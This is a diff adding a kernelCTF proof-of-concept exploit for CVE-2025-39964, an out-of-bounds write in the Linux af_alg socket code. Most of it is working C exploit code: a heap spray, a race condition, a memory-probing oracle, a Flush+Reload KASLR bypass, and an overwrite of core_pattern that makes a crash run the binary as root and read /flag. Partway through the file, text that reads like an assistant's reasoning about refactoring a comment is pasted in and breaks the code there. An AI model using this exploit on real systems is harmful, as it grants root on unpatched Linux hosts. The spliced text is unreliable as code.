+ char *leak_offset = start + (pvec - vec) * 0x1000;
+ pvec = memchr((void *)leak_offset, 'a', 0x1000);
+ if (pvec)
+ break;
+ }
+ start += 0x100000000ULL;
+ }
+ if (pvec == NULL)
+ exit(0);
+ printf("\npvec %p %x\n", pvec, pvec[0]);
+ return (size_t)pvec;
+}
+
+int check_core() {
+ /* Check if /proc/sys/kernel/core_pattern has been overwritten */
+ char core_pattern_buf[0x100] = {};
+ int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
+ read(core, core_pattern_buf, sizeof(core_pattern_buf));
+ close(core);
+ return strncmp(core_pattern_buf, "|/proc/%P/fd/666", 0x10) == 0;
+}
+
+void crash(char *cmd) {
+ int memfd = memfd_create("", 0);
+ /* send our binary to memfd for core_pattern payload */
+ SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
+ /* our binary now at file descriptor 666 */
+ dup2(memfd, 666);
+ close(memfd);
+ while (check_core() == 0)
+ sleep(1);
+ puts("Root shell !!");
+ /* Trigger program crash and cause kernel to execute program from core_pattern
+ * which is our "root" binary */
+ *(size_t *)0 = 0;
+}
+
+size_t bypass_kaslr(u64 base);
+
+int guess_addr(size_t guesss) {
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = guesss;
+ write(cfd[1], buf, 0x100);
+ buf[0] = 'b';
+ int x = send(opfd, buf, 1, MSG_MORE);
+ printf("x: %d\n", x);
+ return x == 1;
+}
+
+int trigger_exploit();
+int main(int argc, char **argv) {
+
+ setvbuf(stdin, 0, 2, 0);
+ setvbuf(stdout, 0, 2, 0);
+ puts("Exploit start");
+ if (argc == 1) {
+ size_t stext = 0;
+ if (getenv("KTEXT"))
+ stext = strtoull(getenv("KTEXT"), 0, 16);
+ else
+ stext = bypass_kaslr(0);
+ /* core_pattern symbol is at a fixed offset from _stext; set MIT=1 for
+ * mitigation target */
+ core_pattern = stext + CORE_PATTERN_LTS_OFFSET;
+ printf("got stext 0x%zx 0x%zx\n", stext, core_pattern);
+ }
+
+ struct rlimit rlim = {.rlim_cur = 0xf000, .rlim_max = 0xf000};
+ setrlimit(RLIMIT_NOFILE, &rlim);
+
+ if (argc > 1) {
+#define SYS_pidfd_getfd 438
+ int pid = strtoull(argv[1], 0, 10);
+ int pfd = syscall(SYS_pidfd_open, pid, 0);
+ int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
+ int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
+ int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
+ dup2(stdinfd, 0);
+ dup2(stdoutfd, 1);
+ dup2(stderrfd, 2);
+ /* Run cat /flag multiple times to ensure output is flushed before reboot */
+ for (int i = 0; i < 6; i++)
+ system("cat /flag");
+
+ system("cat /flag;echo o>/proc/sysrq-trigger");
+ execlp("bash", "bash", NULL);
+ }
+ /* Step 7: fork a watcher that polls core_pattern and triggers crash once
+ * overwritten */
+ if (fork() == 0) {
+ set_cpu(0);
+ setsid();
+ crash("");
+ }
+ /* Retry loop: trigger_exploit() may fail the race; restart on failure */
+ while (1) {
+ if (fork() == 0) {
+ trigger_exploit();
+ exit(0);
+ }
+ wait(NULL);
+ }
+}
+
+int trigger_exploit() {
+ int tfmfd;
+
+ set_cpu(1);
+ SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, cfd));
+
+ /* Step 1: spray heap with crafted msg_control buffers */
+ spray_unix_sockets();
+
+ char *addr = SYSCHK(mmap(0, MMAP_REGION_LEN, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANON, -1, 0));
+ struct iovec local = {.iov_base = addr, .iov_len = MMAP_REGION_LEN};
+ struct iovec remote = {.iov_base = addr, .iov_len = MMAP_REGION_LEN};
+
+ struct sockaddr_alg sa = {
+ .salg_family = AF_ALG,
+ .salg_type = "skcipher", /* symmetric key cipher */
+ .salg_name = "cbc(aes)", /* AES in CBC mode */
+ };
+
+ /* Step 2: create and bind the AF_ALG transformation socket */
+ tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0);
+ if (tfmfd == -1) {
+ perror("socket");
+ return 1;
+ }
+
+ if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) != 0) {
+ perror("bind");
+ close(tfmfd);
+ return 1;
+ }
+
+ unsigned char key[32] = {0};
+ if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) != 0) {
+ perror("setsockopt");
+ close(tfmfd);
+ return 1;
+ }
+
+ opfd = accept(tfmfd, NULL, 0);
+ if (opfd == -1) {
+ perror("accept");
+ close(tfmfd);
+ return 1;
+ }
+
+ int val = 0x1000;
+
+ struct {
+ struct cmsghdr cmsg;
+ __u32 op;
+ __u32 ivlen;
+ unsigned char iv[16];
+ } __attribute__((__packed__)) msg;
+
+ memset(&msg, 0, sizeof(msg));
+ msg.cmsg.cmsg_level = SOL_ALG;
+ msg.cmsg.cmsg_type = ALG_SET_OP;
+ msg.cmsg.cmsg_len = CMSG_LEN(sizeof(__u32) + sizeof(__u32) + 16);
+
+ msg.op = ALG_OP_ENCRYPT;
+ msg.ivlen = 16;
+ memset(msg.iv, 0x01, 16);
+
+ struct iovec iov = {
+ .iov_base = buf,
+ .iov_len = 0x1000,
+ };
+
+ struct msghdr msgh;
+ memset(&msgh, 0, sizeof(msgh));
+ msgh.msg_iov = &iov;
+ msgh.msg_iovlen = 1;
+ msgh.msg_control = &msg;
+ msgh.msg_controllen = msg.cmsg.cmsg_len;
+
+ /* Step 3: initial sendmsg to initialise the tsgl; advances sgl->cur to 1 */
+ ssize_t n = sendmsg(opfd, &msgh, MSG_MORE);
+ printf("init %ld\n", n);
+
+ /*
+ * Step 3 (cont): advance sgl->cur from 1 to 124 (MAX_SGL_ENTS - 2) using
+ * SGL_MERGE_ITERATIONS = 0x7b send+recv pairs. Each send allocates one sg
+ * entry (cur++); each recv drains the processed entry so the socket stays
+ * writable. The loop comment in the original PR is:
+ * "the loop with 0x7b + the sendmsg and send calls executes 125 times,
+ * matching MAX_SGL_ENTS - 1 = 126 - 1 = 125."
+ */
+ for (int i = 0; i < SGL_MERGE_ITERATIONS; i++) {
+ SYSCHK(send(opfd, buf, 0x1000, MSG_MORE));
+ n = recv(opfd, buf, 0x1000, 0);
+ }
+
+ /* Advance sgl->cur to 125 = MAX_SGL_ENTS - 1 (one slot before the list is
+ * full) */
+ send(opfd, buf, 0x1000, MSG_MORE);
+ SYSCHK(setsockopt(opfd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val)));
+ printf("setsockopt done\n");
+
+ /*
+ * Step 3 (race): fork two children that race each other:
+ *
+ * Child A (send invalid addr): passes INVALID_USER_ADDR, which causes
+ * af_alg_alloc_tsgl() to allocate a new tsgl (sgl->cur → 0) then fail
+ * in memcpy_from_msg() — leaving ctx->merge = 1 and sgl->cur = 0.
+ *
+ * Child B (send 0x200 bytes): sends a sub-page-size buffer so that
+ * ctx->merge is set to 1 and sgl->cur advances to MAX_SGL_ENTS = 126.
+ *
+ * Desired outcome: both children finish such that ctx->merge == 1 AND the
+ * last tsgl has sgl->cur == 0. The next send() will then use sg[-1].
+ */
+ if (fork() == 0) {
+ /* Child A: trigger new-tsgl allocation then fail — sets sgl->cur = 0 */
+ int x = send(opfd, INVALID_USER_ADDR, 0x400, MSG_MORE);
+ printf("send3 %d\n", x);
+ exit(0);
+ }
+
+ if (fork() == 0) {
+ /* Child B: sub-page send sets ctx->merge = 1 and fills sgl->cur to
+ * MAX_SGL_ENTS */
+ int x = send(opfd, buf, 0x200, MSG_MORE);
+ printf("send2 %d\n", x);
+ exit(0);
+ }
+
+ /*
+ * @sleep(desc="wait for both fork children to reach their send() calls and
+ * set ctx->merge=1 with sgl->cur=0 before we recv()")
+ */
+ sleep(1);
+ n = recv(opfd, buf, 0x1000, 0);
+ printf("recv2 %ld\n", n);
+ wait(NULL);
+
+ /* Step 4: release spray threads so they re-send their crafted payloads */
+ for (int i = 0; i < THREAD_NUM; i++) {
+ write(cfd[1], buf, 1);
+ }
+
+ n = recv(opfd, buf, 0x1000, 0);
+ printf("recv2 %ld\n", n);
+
+ memset(buf, 'z', 0x1000);
+ wait(NULL);
+
+ /* Step 5: map userspace oracle region for the binary search */
+ allocate_map();
+
+ /* Step 5 (OOB trigger): with ctx->merge=1 and sgl->cur=0 this send uses
+ * sg[-1].page_link from our sprayed payload — triggering the OOB write.
+ * Returns -1 if the write destination is unmapped (race failed); 1 if mapped.
+ */
+ int x = send(opfd, buf, 1, MSG_MORE);
+
+ if (x == 1) {
+ puts("Race fail");
+ exit(0);
+ }
+
+ /*
+ * Step 5 (binary search oracle):
+ *
+ * Background:
+ * sg[-1].page_link is effectively a pointer to a struct page in vmemmap.
+ * The kernel computes the write destination as:
+ * dest = page_address(sg_page(sg)) + sg->offset + sg->length
+ * = page_offset_base + (page_link - vmemmap_base) / 64 * PAGE_SIZE
+ * + offset + length
+ * With page_link ≈ 0, the pfn arithmetic wraps to a very large value, and
+ * (page_offset_base + pfn * PAGE_SIZE) wraps further to land within our
+ * userspace oracle region [SCAN_START_ADDR, SCAN_END_ADDR).
+ *
+ * Oracle:
+ * send() returns 1 → the write destination is in a mapped page (success).
+ * send() returns -1 → the destination is unmapped (copy_from_user failed).
+ * By progressively munmap-ing halves of the oracle region we can determine
+ * which physical page corresponds to the OOB write target.
+ *
+ * Binary search (8 iterations → narrows range from SCAN_END_ADDR to ~340 MB):
+`
+
+The user wants to refactor the explanation.
+
+Let's try to fit the user's text into the comment block.
+
+```c
+ * Each iteration j tests: "if I decrease page_link by half_range/64, does
+ * (Note: /64 is a simplification of the formula (addr / 0x1000) * 64. We
+ * divide the address by 0x1000 to find the page index, and then multiply
+ * by 64 because each memory page has a page_struct that is exactly 64
+ * bytes long)"
+```
+
+However, the context already has:
+`* the write still succeed
+ * the write still succeed?"
+ * - Decreasing page_link by Δ shifts dest by Δ*64 bytes (since each
+ * struct-page unit = 64 bytes = one PAGE_SIZE/64 step in physmap).
+ * - The test delta (SCAN_END_ADDR >> (7+j)) in page_link units equals
+ * half_range = (SCAN_END_ADDR >> (1+j)) in dest-address units.
+ * If the shifted oracle still succeeds → dest is in the *upper* half →
+ * unmap the lower half and advance start.
+ * Otherwise → dest is in the *lower* half → unmap the upper half.
+ */
+ size_t oracle;
+ size_t leak_offset = 0;
+ int xcnt = 0;
+ for (int k = 0; k < MAX_SCAN_ITERATIONS; k++) {
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] -= (SCAN_END_ADDR >> 6);
+ write(cfd[1], buf, 0x100);
+ buf[0] = 'a';
+ x = send(opfd, buf, 1, MSG_MORE);
+ if (x == 1) {
+ puts("");
+ xcnt++;
+ oracle = *(size_t *)&payload[PAYLOAD_OFFS_TARGET];
+ char *start = (void *)(0ULL);
+ for (int j = 0; j < 8; j++) {
+ printf("loop j: %d\n", j);
+ x = guess_addr(oracle - (SCAN_END_ADDR >> (7 + j)));
+ if (x == 1) {
+ xcnt++;
+ start += (SCAN_END_ADDR >> (1 + j)); /* upper half */
+ munmap(start - (SCAN_END_ADDR >> (1 + j)),
+ (SCAN_END_ADDR >> (1 + j)));
+ } else {
+ munmap(start + (SCAN_END_ADDR >> (1 + j)),
+ (SCAN_END_ADDR >> (1 + j)));
+ }
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle;
+ /* search_offset returns the exact userspace VA of the OOB-written page */
+ leak_offset = search_offset(start) + xcnt;
+ printf("leak_offset %zx\n", leak_offset);
+ printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]);
+
+ break;
+ }
+ }
+
+ if (leak_offset == 0)
+ exit(0);
+
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle;
+ write(cfd[1], buf, 0x100);
+
+ /*
+ * Step 6: redirect the OOB write to core_pattern.
+ *
+ * leak_offset is the VA of the currently-targeted physical page.
+ * core_pattern is the KASLR-adjusted kernel VA of core_pattern[].
+ *
+ * First, align within-page: send adjust_offset bytes so that after the
+ * advance the write starts at the same within-page offset as core_pattern.
+ */
+ size_t adjust_offset =
+ PAGE_SIZE + (core_pattern & PAGE_MASK) - (leak_offset & PAGE_MASK);
+ leak_offset += adjust_offset;
+
+ memset(buf, 'z', 0x1000);
+ SYSCHK(send(opfd, buf, adjust_offset - 1, MSG_MORE));
+ SYSCHK(send(opfd, buf, 1, MSG_MORE));
+
+ printf("sg->len overflow check %x\n", *(char *)(leak_offset - 1));
+ if (*(char *)(leak_offset - 1) != 'z')
+ leak_offset -= 0x100000000ULL;
+
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+
+ /*
+ * Now adjust payload[PAYLOAD_OFFS_TARGET] (= sg[-1].page_link) so that
+ * page_address(sg_page(sg)) points to the physical page holding core_pattern.
+ * The >> 6 (or / 64) is actually a simplification of the formula
+ * (addr / 0x1000) * 64. We divide the address by 0x1000 to find the page
+ * index, and then multiply by 64 because each memory page has a page_struct
+ * that is exactly 64 bytes long.
+ * payload[PAYLOAD_OFFS_TARGET] is sg[-1].page_link, which controls dest via
+ * the formula described in the binary search comment above.
+ */
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] +=
+ (((core_pattern & ~PAGE_MASK) - (leak_offset & ~PAGE_MASK)) >> 6);
+ printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]);
+ write(cfd[1], buf, 0x100);
+ /* Step 6 (write): send the core_pattern string; kernel copies it to
+ * core_pattern[] */
+ char mcore[64] = "|/proc/%P/fd/666 %P";
+ SYSCHK(send(opfd, mcore, 64, MSG_MORE));
+ PAUSE;
+
+ return 0;
+}
+
+inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
+ uint64_t a, d;
+ asm volatile("mfence\n\t"
+ "RDTSCP\n\t"
+ "mov %%rdx, %0\n\t"
+ "mov %%rax, %1\n\t"
+ "xor %%rax, %%rax\n\t"
+ "lfence\n\t"
+ : "=r"(d), "=r"(a)
+ :
+ : "%rax", "%rbx", "%rcx", "%rdx");
+ a = (d << 32) | a;
+ return a;
+}
+
+inline __attribute__((always_inline)) uint64_t rdtsc_end() {
+ uint64_t a, d;
+ asm volatile("xor %%rax, %%rax\n\t"
+ "lfence\n\t"
+ "RDTSCP\n\t"
+ "mov %%rdx, %0\n\t"
+ "mov %%rax, %1\n\t"
+ "mfence\n\t"
+ : "=r"(d), "=r"(a)
+ :
+ : "%rax", "%rbx", "%rcx", "%rdx");
+ a = (d << 32) | a;
+ return a;
+}
+
+void prefetch(void *p) {
+ asm volatile("prefetchnta (%0)\n"
+ "prefetcht2 (%0)\n"
+ :
+ : "r"(p));
+}
+
+size_t flushandreload(void *addr) /* row miss */
+{
+ size_t time = rdtsc_begin();
+ prefetch(addr);
+ size_t delta = rdtsc_end() - time;
+ return delta;
+}
+
+/*
+ * KASLR bypass via Flush+Reload side channel.
+ *
+ * Uncomment KASLR_BYPASS_INTEL for Intel CPUs (kernelCTF remote instances).
+ * Keep commented for GitHub CI (AMD/other) to use the sliding-window variant.
+ * Alternatively pass -DKASLR_BYPASS_INTEL to the compiler without touching
+ * source.
+ */
+// #define KASLR_BYPASS_INTEL
+size_t bypass_kaslr(u64 base) {
+ if (!base) {
+#ifdef KASLR_BYPASS_INTEL
+#define OFFSET 0
+#define START (0xffffffff81000000ull + OFFSET)
+#define END (0xffffffffD0000000ull + OFFSET)
+#define STEP 0x0000000001000000ull
+ while (1) {
+ u64 bases[7] = {0};
+ for (int vote = 0; vote < ARRAY_LEN(bases); vote++) {
+ size_t times[(END - START) / STEP] = {};
+ uint64_t addrs[(END - START) / STEP];
+
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ times[ti] = ~0;
+ addrs[ti] = START + STEP * (u64)ti;
+ }
+
+ for (int i = 0; i < 16; i++) {
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ u64 addr = addrs[ti];
+ size_t t = flushandreload((void *)addr);
+ if (t < times[ti]) {
+ times[ti] = t;
+ }
+ }
+ }
+
+ size_t minv = ~0;
+ size_t mini = -1;
+ for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) {
+ if (times[ti] < minv) {
+ mini = ti;
+ minv = times[ti];
+ }
+ }
+
+ if (mini < 0) {
+ return -1;
+ }
+
+ bases[vote] = addrs[mini];
+ }
+
+ int c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (c == 0) {
+ base = bases[i];
+ } else if (base == bases[i]) {
+ c++;
+ } else {
+ c--;
+ }
+ }
+
+ c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (base == bases[i]) {
+ c++;
+ }
+ }
+ if (c > ARRAY_LEN(bases) / 2) {
+ base -= OFFSET;
+ goto got_base;
+ }
+
+ printf("majority vote failed:\n");
+ printf("base = %llx with %d votes\n", base, c);
+ }
+#else
+#define START (0xffffffff81000000ull)
+#define END (0xffffffffc0000000ull)
+#define STEP 0x0000000000200000ull
+#define NUM_TRIALS 9
+/* largest contiguous mapped area at the beginning of _stext */
+#define WINDOW_SIZE 11
+
+ while (1) {
+ u64 bases[NUM_TRIALS] = {0};
+
+ for (int vote = 0; vote < ARRAY_LEN(bases); vote++) {
+ size_t times[(END - START) / STEP] = {};
+ uint64_t addrs[(END - START) / STEP];
+
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ times[ti] = ~0;
+ addrs[ti] = START + STEP * (u64)ti;
+ }
+
+ for (int i = 0; i < 16; i++) {
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ u64 addr = addrs[ti];
+ size_t t = flushandreload((void *)addr);
+ if (t < times[ti]) {
+ times[ti] = t;
+ }
+ }
+ }
+
+ uint64_t max = 0;
+ int max_i = 0;
+ for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) {
+ uint64_t sum = 0;
+ for (int i = 0; i < WINDOW_SIZE; i++) {
+ sum += times[ti + i];
+ }
+ if (sum > max) {
+ max = sum;
+ max_i = ti;
+ }
+ }
+
+ bases[vote] = addrs[max_i];
+ }
+
+ int c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (c == 0) {
+ base = bases[i];
+ } else if (base == bases[i]) {
+ c++;
+ } else {
+ c--;
+ }
+ }
+
+ c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (base == bases[i]) {
+ c++;
+ }
+ }
+ if (c > ARRAY_LEN(bases) / 2) {
+ goto got_base;
+ }
+
+ printf("majority vote failed:\n");
+ printf("base = %llx with %d votes\n", base, c);
+ }
+#endif
+ }
+
+got_base:
+
+ printf("using kernel base %llx\n", base);
+
+ return base;
+}
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/Makefile b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/Makefile
new file mode 100644
index 000000000..3eabaca61
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/Makefile
@@ -0,0 +1,5 @@
+all: exploit
+
+exploit: exploit.c
+ gcc -static-pie -o exploit exploit.c
+
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit
new file mode 100755
index 000000000..a06f17248
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit.c b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit.c
new file mode 100644
index 000000000..3c109bbd3
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/exploit/mitigation-v4-6.6/exploit.c
@@ -0,0 +1,893 @@
+/*
+ * Exploit for CVE-2025-39964 — Linux af_alg out-of-bounds write
+ * (mitigation-v4-6.6)
+ *
+ * Vulnerability: af_alg_sendmsg() has a race condition allowing two concurrent
+ * sendmsg calls to produce ctx->merge=1 with sgl->cur=0 simultaneously.
+ * In this state the merge branch computes sg = sgl->sg + sgl->cur - 1 = sg[-1],
+ * which is an out-of-bounds read into the previous heap chunk. The
+ * sg[-1].page_link value from the previous chunk controls the destination of
+ * memcpy_from_msg(), giving an arbitrary kernel write primitive.
+ *
+ * Exploit chain (mitigation-v4-6.6):
+ * 1. Spray 0x100 AF_UNIX socket pairs; each thread sends a crafted msghdr
+ * whose msg_control (payload[]) lands in the heap slot just before an
+ * af_alg_tsgl. payload[PAYLOAD_OFFS_TARGET] controls sg[-1].page_link = write
+ * destination.
+ * 2. Set up an AF_ALG socket (AES-CBC); advance sgl->cur to MAX_SGL_ENTS-1 =
+ * 125 using 1 sendmsg + SGL_MERGE_ITERATIONS send/recv pairs + 1 more send.
+ * 3. Fork two children that race: one sets ctx->merge=1
+ * (sgl->cur→MAX_SGL_ENTS), the other allocates a new sgl (sgl->cur→0) via an
+ * invalid userspace pointer.
+ * 4. With ctx->merge=1 and sgl->cur=0, the next sendmsg triggers the OOB write
+ * to the address derived from payload[PAYLOAD_OFFS_TARGET].
+ * 5. Map [SCAN_START_ADDR, SCAN_END_ADDR) in MAP_CHUNK_SIZE (2 GB) chunks so
+ * the OOB write destination (which wraps into userspace due to page_link
+ * arithmetic) falls in a mapped region. An 8-step binary search (oracle =
+ * send() return value) narrows the target to a ~340 MB window; mincore then
+ * locates the exact page.
+ * 6. Adjust the write destination via page_link arithmetic to point to the
+ * core_pattern kernel symbol, then write "|/proc/%P/fd/666 %P".
+ * 7. A forked child watches for core_pattern to change, then faults (NULL
+ * deref), causing the kernel to execute our binary as root via core_pattern.
+ * 8. Re-exec reads /flag via pidfd_getfd() on the parent's stdio descriptors.
+ */
+
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#ifndef SYS_pidfd_getfd
+#define SYS_pidfd_getfd 438
+#endif
+
+#ifndef SYS_pidfd_open
+#define SYS_pidfd_open 434
+#endif
+
+size_t vmemmap_base = 0xffffea0000000000ULL;
+size_t page_offset_base = 0xffff888000000000ULL;
+size_t core_pattern = 0xffffffff8420d520ULL;
+
+/* Socket options */
+#define ALG_SET_KEY 1
+#define ALG_SET_IV 2
+#define ALG_SET_OP 3
+#define ALG_SET_AEAD_ASSOCLEN 4
+#define ALG_SET_AEAD_AUTHSIZE 5
+#define ALG_SET_DRBG_ENTROPY 6
+#define ALG_SET_KEY_BY_KEY_SERIAL 7
+
+/* Operations */
+#define ALG_OP_DECRYPT 0
+#define ALG_OP_ENCRYPT 1
+
+typedef unsigned char u8;
+typedef unsigned short u16;
+typedef unsigned int u32;
+typedef unsigned long long u64;
+typedef char i8;
+typedef short i16;
+typedef int i32;
+typedef long long i64;
+#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0]))
+
+#define __u32 uint32_t
+#define __u16 uint16_t
+#define __u8 uint8_t
+#define PAUSE \
+ { \
+ int x; \
+ printf(":"); \
+ read(0, &x, 1); \
+ }
+
+#define SYSCHK(x) \
+ ({ \
+ typeof(x) __res = (x); \
+ if (__res == (typeof(x))-1) \
+ err(1, "SYSCHK(" #x ")"); \
+ __res; \
+ })
+
+#ifndef SYS_process_vm_readv
+#define SYS_process_vm_readv 310
+#endif
+
+/* Number of AF_UNIX pairs to spray; one pair per exploit thread */
+#define THREAD_NUM 0x100
+
+/*
+ * Size of each private anonymous mapping used as the OOB write oracle region:
+ * 512 PTEs per page * PAGE_SIZE = 2 MB physical coverage per mmap entry.
+ */
+#define MMAP_REGION_LEN (0x1000 / 8 * 0x1000)
+
+/*
+ * Start of the contiguous userspace region we map for the binary-search oracle.
+ * We start just above the 4 GB boundary to avoid the low userspace region.
+ */
+#define SCAN_START_ADDR 0x100000000ULL
+
+/* Maximum number of mincore windows tried during the page-address scan */
+#define MAX_SCAN_ITERATIONS 0x50
+
+/*
+ * Unmapped address passed as invalid user pointer to trigger the race
+ * condition: the first 4 MB of virtual address space (0–0xfff000) is always
+ * unmapped.
+ */
+#define INVALID_USER_ADDR ((void *)0xfff000)
+
+/*
+ * Byte offset of sg[-1].page_link inside the sprayed msg_control payload:
+ * af_alg_tsgl is allocated in a 4096-byte slab object.
+ * sgl->sg[0] starts at byte 24 (sizeof(af_alg_tsgl)).
+ * sg[-1] = sgl->sg[-1] lies 32 bytes (sizeof(scatterlist)) before sg[0],
+ * i.e. at byte 24 - 32 = -8 relative to the tsgl object start.
+ * In the *previous* 4096-byte heap object that is offset 4096 - 8 = 0xff8.
+ * scatterlist.page_link is the first field (offset 0), so payload[0xff8]
+ * directly controls the page_link that the OOB write uses as its destination.
+ */
+#define PAYLOAD_OFFS_TARGET 0xff8
+
+/*
+ * Number of send/recv iterations to advance sgl->cur from 1 to 124
+ * (MAX_SGL_ENTS-2). MAX_SGL_ENTS = (4096 - sizeof(af_alg_tsgl)) /
+ * sizeof(scatterlist) - 1 = (4096 - 24) / 32 - 1 = 126. One initial sendmsg
+ * sets cur=1; SGL_MERGE_ITERATIONS send+recv pairs bring it to 1 + 0x7b = 124;
+ * one more send brings it to 125 = MAX_SGL_ENTS - 1.
+ */
+#define SGL_MERGE_ITERATIONS 0x7b
+
+/* Compile-time unslid base of kernel text (_stext); used when computing symbol
+ * offsets */
+#define KERNEL_TEXT_BASE 0xffffffff81000000UL
+
+/*
+ * KASLR-invariant offset of core_pattern from _stext in mitigation-v4-6.6.
+ * core_pattern is at 0xffffffff83db3720; _stext is at KERNEL_TEXT_BASE.
+ */
+#define CORE_PATTERN_MIT_OFFSET (0xffffffff83db3720UL - KERNEL_TEXT_BASE)
+
+/*
+ * The mitigation kernel's physmap base is shifted up by 4 GB relative to
+ * LTS/COS. This additional page_link adjustment (4 GB / 64 = 0x4000000)
+ * is applied statically rather than via a runtime environment variable.
+ */
+#define MITIGATION_PHYSMAP_EXTRA_OFFSET (0x100000000ULL >> 6)
+
+/* Upper bound of the userspace oracle scan region [SCAN_START_ADDR,
+ * SCAN_END_ADDR) */
+#define SCAN_END_ADDR 0x500000000000ULL
+
+/* Size of each anonymous 2 GB mmap chunk used to cover the oracle region */
+#define MAP_CHUNK_SIZE 0x80000000ULL
+
+#ifndef PAGE_SIZE
+#define PAGE_SIZE 0x1000
+#endif
+/* Page offset mask for within-page alignment (PAGE_SIZE - 1) */
+#define PAGE_MASK (PAGE_SIZE - 1)
+
+pthread_t tid[THREAD_NUM];
+
+/* Shared scratch buffer used by spray threads and the main exploit loop */
+char buf[0x10000];
+char vec[0x100000];
+
+int cfd[2];
+int sfd[THREAD_NUM][2];
+char payload[0x1000];
+int opfd;
+
+struct sockaddr_alg {
+ __u16 salg_family;
+ __u8 salg_type[14];
+ __u32 salg_feat;
+ __u32 salg_mask;
+ __u8 salg_name[64];
+};
+
+void set_cpu(int i) {
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(i, &mask);
+ sched_setaffinity(0, sizeof(mask), &mask);
+}
+
+void *spray_send_thread(void *x) {
+ size_t idx = (size_t)x;
+ write(cfd[0], buf, 1);
+ read(cfd[0], buf, 1);
+ struct iovec iov = {buf, 0x1000};
+ struct msghdr mhdr = {.msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = payload,
+ .msg_controllen = 0x1000};
+ while (1) {
+ sendmsg(sfd[idx][1], &mhdr, 0);
+ write(cfd[0], buf, 1);
+ read(cfd[0], buf, 1);
+ }
+}
+
+/*
+ * Step 1: Spray THREAD_NUM AF_UNIX socket pairs, each sending a crafted msghdr
+ * whose msg_control buffer (payload[]) will occupy the heap slot immediately
+ * preceding an af_alg_tsgl allocation. payload[PAYLOAD_OFFS_TARGET] then
+ * aliases sg[-1].page_link and controls the OOB write destination.
+ */
+void spray_unix_sockets() {
+ memset(payload, 'a', 0x1000);
+ struct cmsghdr *first;
+ first = (struct cmsghdr *)payload;
+ first->cmsg_len = 0x1000;
+ first->cmsg_level =
+ 0; /* must differ from SOL_SOCKET=1 to skip cmsg processing */
+ first->cmsg_type = 0x41414141; /* dummy filler value */
+ /* Initially zero; the binary search will update this to guide the OOB write
+ */
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = 0;
+
+ for (int i = 0; i < THREAD_NUM; i++) {
+ SYSCHK(socketpair(AF_UNIX, SOCK_DGRAM, 0, sfd[i]));
+ int n = 0x800;
+ setsockopt(sfd[i][1], SOL_SOCKET, SO_SNDBUF, (char *)&n, sizeof(n));
+ setsockopt(sfd[i][0], SOL_SOCKET, SO_RCVBUF, (char *)&n, sizeof(n));
+ write(sfd[i][1], buf, 0x1000);
+ }
+
+ for (int i = 0; i < THREAD_NUM; i++)
+ pthread_create(&tid[i], 0, spray_send_thread, (void *)(size_t)i);
+
+ for (int i = 0; i < THREAD_NUM; i++)
+ read(cfd[1], buf, 1);
+}
+
+/*
